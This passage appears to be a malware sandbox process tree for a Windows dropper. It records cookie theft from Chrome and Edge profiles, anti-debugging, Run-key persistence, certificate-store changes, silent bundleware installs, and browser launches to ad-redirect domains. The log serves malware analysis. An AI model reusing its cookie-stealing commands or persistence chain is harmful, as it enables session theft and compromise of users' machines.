C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 2764⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\gq7BdFzcCpgT9R8qUlDBiVoJ.exe"C:\Users\Admin\Documents\gq7BdFzcCpgT9R8qUlDBiVoJ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 2764⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\2D6KXJ4Sih2rnKqehqnnaTsh.exe"C:\Users\Admin\Documents\2D6KXJ4Sih2rnKqehqnnaTsh.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"4⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\Documents\JJPVa_sOJMzqe2j7ZHG84SEf.exe"C:\Users\Admin\Documents\JJPVa_sOJMzqe2j7ZHG84SEf.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\JJPVa_sOJMzqe2j7ZHG84SEf.exeC:\Users\Admin\Documents\JJPVa_sOJMzqe2j7ZHG84SEf.exe4⤵
-
C:\Users\Admin\Documents\F8iDNg2j1mYQjJrSJjuQ9boD.exe"C:\Users\Admin\Documents\F8iDNg2j1mYQjJrSJjuQ9boD.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\8hYCRVQG3M8blCFUnrCF4_z3.exe"C:\Users\Admin\Documents\8hYCRVQG3M8blCFUnrCF4_z3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\2u55W290oBvJVcrb8gcaR3aD.exe"C:\Users\Admin\Documents\2u55W290oBvJVcrb8gcaR3aD.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8259576.exe"C:\Users\Admin\AppData\Roaming\8259576.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6609898.exe"C:\Users\Admin\AppData\Roaming\6609898.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3712 -s 22965⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\kkDrRR_yCJmCdQFYoj6gRE_m.exe"C:\Users\Admin\Documents\kkDrRR_yCJmCdQFYoj6gRE_m.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\kkDrRR_yCJmCdQFYoj6gRE_m.exeC:\Users\Admin\Documents\kkDrRR_yCJmCdQFYoj6gRE_m.exe4⤵
-
C:\Users\Admin\Documents\HigBkRPx0qyWn99cHptOkbti.exe"C:\Users\Admin\Documents\HigBkRPx0qyWn99cHptOkbti.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 3164⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\dcN39oeQcO1TI8LbRct_X8zm.exe"C:\Users\Admin\Documents\dcN39oeQcO1TI8LbRct_X8zm.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\Y7aLf8zJ97XcPikNEtC8S9tn.exe"C:\Users\Admin\Documents\Y7aLf8zJ97XcPikNEtC8S9tn.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\KlF1TC_kNM1irfli5mSNl_JB.exe"C:\Users\Admin\Documents\KlF1TC_kNM1irfli5mSNl_JB.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\KlF1TC_kNM1irfli5mSNl_JB.exeC:\Users\Admin\Documents\KlF1TC_kNM1irfli5mSNl_JB.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\tjy1GrraGlAjKtsTJ6fwTeqw.exe"C:\Users\Admin\Documents\tjy1GrraGlAjKtsTJ6fwTeqw.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\WNJCVPrW3aAcLvQSoBp1SYrf.exe"C:\Users\Admin\Documents\WNJCVPrW3aAcLvQSoBp1SYrf.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\ZH_D8d_woMBuwaliVLK7dXsO.exe"C:\Users\Admin\Documents\ZH_D8d_woMBuwaliVLK7dXsO.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 2764⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\YqIXiCL33maLAy2OB92ojfwd.exe"C:\Users\Admin\Documents\YqIXiCL33maLAy2OB92ojfwd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-IHMEQ.tmp\YqIXiCL33maLAy2OB92ojfwd.tmp"C:\Users\Admin\AppData\Local\Temp\is-IHMEQ.tmp\YqIXiCL33maLAy2OB92ojfwd.tmp" /SL5="$20284,138429,56832,C:\Users\Admin\Documents\YqIXiCL33maLAy2OB92ojfwd.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-F8N6E.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-F8N6E.tmp\Setup.exe" /Verysilent5⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1524 -s 2287⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet6⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629272556 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"7⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-FGPPS.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-FGPPS.tmp\WEATHER Manager.tmp" /SL5="$40240,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-7738O.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7738O.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7158⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-7738O.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-7738O.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629272556 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"9⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-2LTVG.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-2LTVG.tmp\VPN.tmp" /SL5="$402FE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-857PD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-857PD.tmp\Setup.exe" /silent /subid=7208⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-2QFEV.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-2QFEV.tmp\Setup.tmp" /SL5="$104C2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-857PD.tmp\Setup.exe" /silent /subid=7209⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 17647⤵
- Program crash
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-CDSIJ.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-CDSIJ.tmp\MediaBurner2.tmp" /SL5="$103E8,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-OPF6A.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-OPF6A.tmp\3377047_logo_media.exe" /S /UID=burnerch28⤵
- Drops file in Drivers directory
- Executes dropped EXE
-
C:\Program Files\Windows Defender Advanced Threat Protection\FJGGDEFOYM\ultramediaburner.exe"C:\Program Files\Windows Defender Advanced Threat Protection\FJGGDEFOYM\ultramediaburner.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-D90VE.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-D90VE.tmp\ultramediaburner.tmp" /SL5="$30534,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\FJGGDEFOYM\ultramediaburner.exe" /VERYSILENT10⤵
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu11⤵
-
C:\Users\Admin\AppData\Local\Temp\f7-3a4aa-df3-f0589-27e62070f3d91\SHubolekyda.exe"C:\Users\Admin\AppData\Local\Temp\f7-3a4aa-df3-f0589-27e62070f3d91\SHubolekyda.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721510⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311910⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc471811⤵
-
C:\Users\Admin\AppData\Local\Temp\7b-7d035-e0f-364ac-b11b18ba9d24c\Behynomaeri.exe"C:\Users\Admin\AppData\Local\Temp\7b-7d035-e0f-364ac-b11b18ba9d24c\Behynomaeri.exe"9⤵
-
